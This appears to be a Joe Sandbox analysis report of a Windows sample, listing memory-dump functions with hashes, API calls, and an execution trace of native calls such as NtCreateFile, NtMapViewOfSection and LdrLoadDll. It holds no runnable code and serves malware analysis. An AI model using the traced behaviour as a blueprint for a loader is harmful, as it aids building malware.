                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2360000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: 1cc2804253b79dd1ce15cc0cfecde6ca395e0a8477b2bfd966c0a04b34fa2228
                                  • Instruction ID: d86b55b94dcbcdeeafdc00a1f5673526a0ea30723b3239bb6d849764276fa1e4
                                  • Opcode Fuzzy Hash: 1cc2804253b79dd1ce15cc0cfecde6ca395e0a8477b2bfd966c0a04b34fa2228
                                  • Instruction Fuzzy Hash: 6B21C4B59002489FDB10CF9AD584AEEFBF9FB48310F14841AE918A3350D379A954CFA5
                                  Function 0236D629 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 651 236d629-236d6c4 DuplicateHandle 652 236d6c6-236d6cc 651->652 653 236d6cd-236d6ea 651->653 652->653
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0236D6B7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2085800551.0000000002360000.00000040.00000800.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2360000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: e58047bf726acaef37198675e09fd8f5a8032a41b988ebe57ea5e5c51f6736b6
                                  • Instruction ID: a3084db5599b6f3f491c20f06419fbf1e6d950893db6602268c9652ef6eca0b3
                                  • Opcode Fuzzy Hash: e58047bf726acaef37198675e09fd8f5a8032a41b988ebe57ea5e5c51f6736b6
                                  • Instruction Fuzzy Hash: D921E2B5900248DFDB10CFAAD584AEEBFF9FB48314F14841AE918A7310C378A950CFA4
                                  Function 0236A0D0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 661 236a0d0-236b200 663 236b202-236b205 661->663 664 236b208-236b237 LoadLibraryExW 661->664 663->664 665 236b240-236b25d 664->665 666 236b239-236b23f 664->666 666->665
                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0236B019,00000800,00000000,00000000), ref: 0236B22A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2085800551.0000000002360000.00000040.00000800.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2360000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 8b467e9d2f0484f0504a4c16f5ce15316f36711331910cdeef6eb7e4c9bdd349
                                  • Instruction ID: 564ca4382c5fba9ad8f93a1e8242e3653762b0cca9df2d45a9188d28cb5c842a
                                  • Opcode Fuzzy Hash: 8b467e9d2f0484f0504a4c16f5ce15316f36711331910cdeef6eb7e4c9bdd349
                                  • Instruction Fuzzy Hash: D31112B69003089FDB10CF9AD448AAEFBF9EB48314F10842EE519B7210C379A545CFA4
                                  Function 0236B1B9 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 669 236b1b9-236b200 670 236b202-236b205 669->670 671 236b208-236b237 LoadLibraryExW 669->671 670->671 672 236b240-236b25d 671->672 673 236b239-236b23f 671->673 673->672
                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0236B019,00000800,00000000,00000000), ref: 0236B22A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2085800551.0000000002360000.00000040.00000800.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2360000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: a14460219cf721b327fea2a487071e106299b22f8f937cb3e7b73678aa92b8e9
                                  • Instruction ID: 57a3afcf151770327229206453d7a71b6585799a2ae5e6d62a9cb1367b46cf06
                                  • Opcode Fuzzy Hash: a14460219cf721b327fea2a487071e106299b22f8f937cb3e7b73678aa92b8e9
                                  • Instruction Fuzzy Hash: B91112B6D002098FDB10DFAAD588AEEFBF9EB48314F10841EE419B7600C379A545CFA4
                                  Function 0236AF38 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 676 236af38-236af78 677 236af80-236afab GetModuleHandleW 676->677 678 236af7a-236af7d 676->678 679 236afb4-236afc8 677->679 680 236afad-236afb3 677->680 678->677 680->679
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0236AF9E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2085800551.0000000002360000.00000040.00000800.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2360000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 4ad6cf162872db097f3ae2151f4a92215627311c2bfa73dc9a11c32e4925e567
                                  • Instruction ID: def1dccba8dbbca68681c78e44d34fb9d0d5273a25e54263094ab4c69c209de5
                                  • Opcode Fuzzy Hash: 4ad6cf162872db097f3ae2151f4a92215627311c2bfa73dc9a11c32e4925e567
                                  • Instruction Fuzzy Hash: BE11DFB6C003498FCB10DF9AD948ADEFBF8EF88214F10845AD919B7214C379A545CFA1
                                  Function 06A6FCE0 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 682 6a6fce0-6a6fd4a PostMessageW 683 6a6fd53-6a6fd67 682->683 684 6a6fd4c-6a6fd52 682->684 684->683
                                  APIs
                                  • PostMessageW.USER32(?,?,?,?), ref: 06A6FD3D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2101156033.0000000006A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6a60000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: c77cf80f04d376317d2c44cc05b3b97731124d62d70bb945206ab37a703d6a69
                                  • Instruction ID: 4494747e1118e0da5b400675962f47bdb8a09227426ddd1fc15a95088601bce1
                                  • Opcode Fuzzy Hash: c77cf80f04d376317d2c44cc05b3b97731124d62d70bb945206ab37a703d6a69
                                  • Instruction Fuzzy Hash: 9111D3B5800349DFDB10DF9AD845BDEFBF8EB48314F108419E518A7210C379A544CFA1
                                  Function 008AD01C Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2084715182.00000000008AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008AD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8ad000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2707af4d181a8d0ab858732b79d7d8692d32999f81497065596086404a155718
                                  • Instruction ID: a5e36987433024464e50c41bbcb247f97b6e7d4412967de328e6caf436e08893
                                  • Opcode Fuzzy Hash: 2707af4d181a8d0ab858732b79d7d8692d32999f81497065596086404a155718
                                  • Instruction Fuzzy Hash: 1F212271604704DFEB14DF24D980B26BF65FB89314F20C569D90ACBB96C33AD807CA61
                                  Function 008AD1D4 Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2084715182.00000000008AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008AD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8ad000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 767473753b29399c172566037309db1ec19e1e0a0af66228dbfbfde9ece2df63
                                  • Instruction ID: dd5a1eeb93dba0a8b3636db37e7eb68be5847ec9df41835c993ac9c8a384a5ed
                                  • Opcode Fuzzy Hash: 767473753b29399c172566037309db1ec19e1e0a0af66228dbfbfde9ece2df63
                                  • Instruction Fuzzy Hash: E021F571504304DFEB05DF14D5C0F26BB65FB85314F20C56DD90ACBA56C33AE806CA61
                                  Function 008AD006 Relevance: .1, Instructions: 63COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2084715182.00000000008AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008AD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8ad000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 56b5bf8529197fdc210a7c5623cc2e69d0c8aad0078c55c55f130cee633123c1
                                  • Instruction ID: c41cfbbb41f90e2e15d74f8f15347c783f0a6b39d08944a19baa9a9236979c3c
                                  • Opcode Fuzzy Hash: 56b5bf8529197fdc210a7c5623cc2e69d0c8aad0078c55c55f130cee633123c1
                                  • Instruction Fuzzy Hash: DD2183755087809FDB02CF14D994711BF71FB46314F28C5DAD8498F6A7C33A9816CB62
                                  Function 008AD1CF Relevance: .1, Instructions: 53COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2084715182.00000000008AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008AD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8ad000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                  • Instruction ID: 6c5f967ad30789d058ae4d0b64aad8b43096f3f2bba36ca7b982a20a4c32d414
                                  • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                  • Instruction Fuzzy Hash: 7A118E75504340DFDB16CF14D5C4B15BB61FB85314F24C6A9D84A8BA66C33AE84ACB61
                                  Function 0A6C01A0 Relevance: .0, Instructions: 50COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2103469969.000000000A6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a6c0000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a00d3492035b50bf3cfe450499d5b6dac327fbda9ed94e962a4cc553aca23080
                                  • Instruction ID: 19e951fc9f1cc57ed93a759fa3f677f9a3f0bea1a05a6e4d229cfc5769dc5bbe
                                  • Opcode Fuzzy Hash: a00d3492035b50bf3cfe450499d5b6dac327fbda9ed94e962a4cc553aca23080
                                  • Instruction Fuzzy Hash: E101ED36340A508FD325DF69C994A66BBF2FF8821471984ADE189CB772DA34D805CF00
                                  Function 0089D745 Relevance: .0, Instructions: 45COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2084515616.000000000089D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0089D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_89d000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5dc1f9306e47e57decb46dda0003b5dd6ffb81d62989ca2f0ce66a32870de2d9
                                  • Instruction ID: 134b837f77a4acc08a605581b70c10d43943cc6da190f3d86575fb9e00b68eae
                                  • Opcode Fuzzy Hash: 5dc1f9306e47e57decb46dda0003b5dd6ffb81d62989ca2f0ce66a32870de2d9
                                  • Instruction Fuzzy Hash: 67012031004344BDDB106E95CD84B67BF9CFF55324F1CC529ED094B246C2399840CA75
                                  Function 0A6C09A8 Relevance: .0, Instructions: 44COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2103469969.000000000A6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a6c0000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2a8e035c42f5ba368ee7c6e1d696a32966874e25b0719a8184ce80e6e91a4298
                                  • Instruction ID: d1a2db06704632b4f160792142a11632429841bdb452474f1804fcb85d8d60c7
                                  • Opcode Fuzzy Hash: 2a8e035c42f5ba368ee7c6e1d696a32966874e25b0719a8184ce80e6e91a4298
                                  • Instruction Fuzzy Hash: 9C016530D15219DFDB109FA5C4087FEBBF0FB06302F1594AAE468A3291E3784A40DF44
                                  Function 0A6C01B0 Relevance: .0, Instructions: 44COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2103469969.000000000A6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a6c0000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c5ef155dcf96be32cd759aaa6543d7d8db3667080c7b6f0ee33455c304d4b692
                                  • Instruction ID: a54df9ceac32000d6c117bdea8cd53072c0e2bf2de4727a5c5479de5d70bd91a
                                  • Opcode Fuzzy Hash: c5ef155dcf96be32cd759aaa6543d7d8db3667080c7b6f0ee33455c304d4b692
                                  • Instruction Fuzzy Hash: 3D017C31340A148FD728DB6ED994A2ABBE6FFC8614B19847CE119CB775DA34EC018B40
                                  Function 0A6C09B8 Relevance: .0, Instructions: 42COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2103469969.000000000A6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a6c0000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1a07e8357955a9eed446364e69c168ce6e2553ea0b89e4d114d795154c2dbfd5
                                  • Instruction ID: 2950414f4d34408a8eb58da67f31478029039ab986affd11519d2e500bdef4f9
                                  • Opcode Fuzzy Hash: 1a07e8357955a9eed446364e69c168ce6e2553ea0b89e4d114d795154c2dbfd5
                                  • Instruction Fuzzy Hash: 3C010870D05259DFDB14DFAAC4087BEBBF0EB46301F0595A99429A3291E7784A40DF54
                                  Function 0089D744 Relevance: .0, Instructions: 36COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2084515616.000000000089D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0089D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_89d000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e0989099f9f86236c7c7f0a199a9fcc6f5ae5aa7761cc8bb870597b1ad32e7d1
                                  • Instruction ID: 485d0f9b2593a0079b7bf3ee8078b7b2aa80a78108d96d52e9ddb55abadc83f5
                                  • Opcode Fuzzy Hash: e0989099f9f86236c7c7f0a199a9fcc6f5ae5aa7761cc8bb870597b1ad32e7d1
                                  • Instruction Fuzzy Hash: 41F09672404344AEEB109E56CC88B66FF98FF95734F18C45AED485B286C2799C44CBB5
                                  Function 0A6C08E8 Relevance: .0, Instructions: 18COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2103469969.000000000A6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a6c0000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 32fa2aff5ee3a174c4fa6c0198b85011f89060c8ec5403b130872f7319b98782
                                  • Instruction ID: d0cb370b2bafe11c17fd3ee8e812142338ec9d0b9c5c1dd522105678f39f804d
                                  • Opcode Fuzzy Hash: 32fa2aff5ee3a174c4fa6c0198b85011f89060c8ec5403b130872f7319b98782
                                  • Instruction Fuzzy Hash: A1D0A961708B1856B3A8EAAA5E0083BB2DE8EC8950305C42EA60DC3210EDA4EC0001A4

                                  Non-executed Functions

                                  Function 06A67852 Relevance: 4.0, Strings: 3, Instructions: 247COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2101156033.0000000006A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6a60000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: TJoq$Tejq$xbmq
                                  • API String ID: 0-903294719
                                  • Opcode ID: 73cfbb58c5e8107dfec691b13dda3c7c76bbbbdfdb388aae7061ac2b3b77e8a3
                                  • Instruction ID: c7484dda5df726e968055555ec9a7a749cd7e2a9e5f9ca046badf6cbd77ecacc
                                  • Opcode Fuzzy Hash: 73cfbb58c5e8107dfec691b13dda3c7c76bbbbdfdb388aae7061ac2b3b77e8a3
                                  • Instruction Fuzzy Hash: D7C16375E016188FDB58DF6AC944AD9BBF2BF88301F14C1A9D809AB365DB309E85CF50
                                  Function 06A60040 Relevance: 2.6, Strings: 2, Instructions: 101COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2101156033.0000000006A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6a60000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: F$P
                                  • API String ID: 0-299210802
                                  • Opcode ID: bde99f4e02d8bcac740eef1814a0ef44893d96110a2db3f6c3aacda0589aff52
                                  • Instruction ID: c908943573cb41108f2f3f7af1af9f1a86c8a92b3b6236fe3555f8217f06c597
                                  • Opcode Fuzzy Hash: bde99f4e02d8bcac740eef1814a0ef44893d96110a2db3f6c3aacda0589aff52
                                  • Instruction Fuzzy Hash: 7F4172B1E016188BEB5CCF6B8D4068AFAF3AFC9300F18C1B9950CAB215DB7105958F55
                                  Function 06A675B8 Relevance: 1.4, Strings: 1, Instructions: 169COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2101156033.0000000006A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6a60000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'jq
                                  • API String ID: 0-3676250632
                                  • Opcode ID: 9fede8f977f05228f7f8219ccc9b706c84cc7b61065a028a95cc0c4bc4439642
                                  • Instruction ID: 983a6d947db2d699669f516e4bafaf9ff1a560f81454b7b3ea3679269cea35c0
                                  • Opcode Fuzzy Hash: 9fede8f977f05228f7f8219ccc9b706c84cc7b61065a028a95cc0c4bc4439642
                                  • Instruction Fuzzy Hash: 1C6110B5E416088FDB08EFBAE94169A7FF2FF88301F14D539D005AB269DB345946CB90
                                  Function 06A675C8 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2101156033.0000000006A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6a60000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'jq
                                  • API String ID: 0-3676250632
                                  • Opcode ID: 0172fde20595d2a51d698cb92b21263fe28fbeb8e01d85f973a4592b776ef3d7
                                  • Instruction ID: bbf99eb2228b9be944bb24740efa0c195989ae2321b522f6c0f89674249dc046
                                  • Opcode Fuzzy Hash: 0172fde20595d2a51d698cb92b21263fe28fbeb8e01d85f973a4592b776ef3d7
                                  • Instruction Fuzzy Hash: 18611FB4E416088FDB08EFAAE94079ABFF6FF88301F14D539D005AB269DB745905CB80
                                  Function 06A6001B Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2101156033.0000000006A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6a60000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: P
                                  • API String ID: 0-3110715001
                                  • Opcode ID: 6744e4e9c1106656a3d32d7d9d37b2743bcb7960ba857328d8bb38f43ea9eaf4
                                  • Instruction ID: 12dcc65eb73c8fbe1dea252ce94c31734df5a07fc8ffde18a80c0f1548865a71
                                  • Opcode Fuzzy Hash: 6744e4e9c1106656a3d32d7d9d37b2743bcb7960ba857328d8bb38f43ea9eaf4
                                  • Instruction Fuzzy Hash: 744165B1D056588FEB1DCF678D40289FBF7AFC9200F18C1BAC45CAA225DB7505568F11
                                  Function 0A6C0D20 Relevance: .5, Instructions: 543COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2103469969.000000000A6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A6C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a6c0000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 04c6f1a0249710be76329be32f7dda4d6711988ac61558be1ce0a97df4472f64
                                  • Instruction ID: ff608ca7eeec329c97f96755204fc2bc2c14a2991254546c988baded07df5798
                                  • Opcode Fuzzy Hash: 04c6f1a0249710be76329be32f7dda4d6711988ac61558be1ce0a97df4472f64
                                  • Instruction Fuzzy Hash: 75F1B9706016048FDB29EBA9C4507AEB7FAEF8A700F15856DC146EB796EB34E801CB50
                                  Function 06A6A840 Relevance: .3, Instructions: 264COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2101156033.0000000006A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6a60000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 52d4a62b07493037561941ecc424bf6fede2a26417d2097b11f7a47e91519008
                                  • Instruction ID: 32a5b0b191cb17452b4ab1b1db2ed72235693d4112d12ad5058e86c89e6dab4e
                                  • Opcode Fuzzy Hash: 52d4a62b07493037561941ecc424bf6fede2a26417d2097b11f7a47e91519008
                                  • Instruction Fuzzy Hash: FAD10735D50B5A8ADB10EF64D950A99B7B5FF96300F11C79AE1093B224FB70AAC4CF81
                                  Function 0236D55C Relevance: .3, Instructions: 264COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2085800551.0000000002360000.00000040.00000800.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2360000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e63ab54178666fe3a78f35ddd886d238deaa96c1215b5e3b651f6608c2e9409e
                                  • Instruction ID: 4124b8392fe1a0da88da18952a129ac2cdbd0abfe0bf6492b213de6f0691b2ab
                                  • Opcode Fuzzy Hash: e63ab54178666fe3a78f35ddd886d238deaa96c1215b5e3b651f6608c2e9409e
                                  • Instruction Fuzzy Hash: FEA1A132E00206CFCF15DFB5D8485AEB7BAFF85304B14856AE802AB269DB71D916CF40
                                  Function 06A6B7A0 Relevance: .2, Instructions: 153COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2101156033.0000000006A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6a60000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f5040fac355e78b76c6477ed7aff595430517bbe22f4cff0ba94726c93b889d6
                                  • Instruction ID: ce091778553c3d041af73805c08b7fa37ee20afc561edbbdfa7d6313848991fa
                                  • Opcode Fuzzy Hash: f5040fac355e78b76c6477ed7aff595430517bbe22f4cff0ba94726c93b889d6
                                  • Instruction Fuzzy Hash: F051E6B5E051199FDB44DFAAD5805AEFBF2FF88300F24C165E418A7355D730A942CBA0
                                  Function 06A6B5E0 Relevance: .1, Instructions: 140COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2101156033.0000000006A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6a60000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2d5bc64a1bd74ea66e7eaabad24601ecfbe58a8509b3c9aa7b9a02925ee0179c
                                  • Instruction ID: b782e9181341184db516bfff49c00ba7ba0f86086c238d1290c8390bdb087d38
                                  • Opcode Fuzzy Hash: 2d5bc64a1bd74ea66e7eaabad24601ecfbe58a8509b3c9aa7b9a02925ee0179c
                                  • Instruction Fuzzy Hash: 6C519D75E012199FDF08DFEAC9846EEBBB2FF88310F14802AE519AB254DB345946CF50

                                  Execution Graph

                                  Execution Coverage:1.3%
                                  Dynamic/Decrypted Code Coverage:1.7%
                                  Signature Coverage:10.8%
                                  Total number of Nodes:409
                                  Total number of Limit Nodes:42
                                  execution_graph 96481 423b43 96482 423b5f 96481->96482 96493 4282f3 96482->96493 96485 423b87 96487 428603 2 API calls 96485->96487 96486 423b9b 96497 428603 96486->96497 96489 423b90 96487->96489 96490 423ba4 96501 42a503 LdrLoadDll RtlAllocateHeap 96490->96501 96492 423baf 96494 428310 96493->96494 96502 4295e3 96494->96502 96496 423b80 96496->96485 96496->96486 96498 428620 96497->96498 96499 4295e3 LdrLoadDll 96498->96499 96500 428631 NtClose 96499->96500 96500->96490 96501->96492 96503 4295f2 96502->96503 96505 42964f 96502->96505 96503->96505 96506 423fe3 96503->96506 96505->96496 96507 423ff1 96506->96507 96508 423ffd 96506->96508 96507->96508 96511 424463 LdrLoadDll 96507->96511 96508->96505 96510 42414f 96510->96505 96511->96510 96512 4284c3 96513 428532 96512->96513 96514 4284e1 96512->96514 96515 4295e3 LdrLoadDll 96513->96515 96516 4295e3 LdrLoadDll 96514->96516 96517 428548 96515->96517 96518 4284fe 96516->96518 96521 40afc3 96518->96521 96520 42852b 96523 40afe8 96521->96523 96522 40b105 NtReadFile 96524 40b13c 96522->96524 96523->96522 96524->96520 96525 42b4c3 96526 42b4d3 96525->96526 96527 42b4d9 96525->96527 96530 42a4c3 96527->96530 96529 42b4ff 96533 4288c3 96530->96533 96532 42a4de 96532->96529 96534 4288dd 96533->96534 96535 4295e3 LdrLoadDll 96534->96535 96536 4288ee RtlAllocateHeap 96535->96536 96536->96532 96553 423ed3 96554 423ee2 96553->96554 96555 423f29 96554->96555 96558 423f67 96554->96558 96560 423f6c 96554->96560 96561 42a3e3 96555->96561 96559 42a3e3 2 API calls 96558->96559 96559->96560 96564 428913 96561->96564 96563 423f36 96565 428930 96564->96565 96566 4295e3 LdrLoadDll 96565->96566 96567 428941 RtlFreeHeap 96566->96567 96567->96563 96568 428393 96569 4283b1 96568->96569 96570 42840a 96568->96570 96572 4295e3 LdrLoadDll 96569->96572 96571 4295e3 LdrLoadDll 96570->96571 96573 428420 96571->96573 96574 4283ce 96572->96574 96577 40ad93 96574->96577 96576 428403 96580 40adb8 96577->96580 96578 40aed5 NtCreateFile 96579 40af14 96578->96579 96579->96576 96580->96578 96537 413da3 96538 413dbc 96537->96538 96539 413dd7 96538->96539 96545 417583 96538->96545 96541 423fe3 LdrLoadDll 96539->96541 96542 413def 96541->96542 96543 413e23 96542->96543 96544 413e10 PostThreadMessageW 96542->96544 96544->96543 96546 4175a7 96545->96546 96547 4175e3 LdrLoadDll 96546->96547 96548 4175ae 96546->96548 96547->96548 96548->96539 96581 41d7d3 96582 41d7f9 96581->96582 96583 423fe3 LdrLoadDll 96582->96583 96585 41d84a 96583->96585 96584 41dbbd 96585->96584 96628 4289a3 LdrLoadDll 96585->96628 96587 41d89b 96588 41dba5 96587->96588 96629 42b5f3 96587->96629 96589 42a3e3 2 API calls 96588->96589 96589->96584 96591 41d8ba 96591->96588 96592 41d9bd 96591->96592 96636 427d33 96591->96636 96635 4188a3 LdrLoadDll LdrInitializeThunk 96592->96635 96596 41d9e8 96596->96588 96599 41da1d 96596->96599 96644 418793 NtMapViewOfSection LdrLoadDll 96596->96644 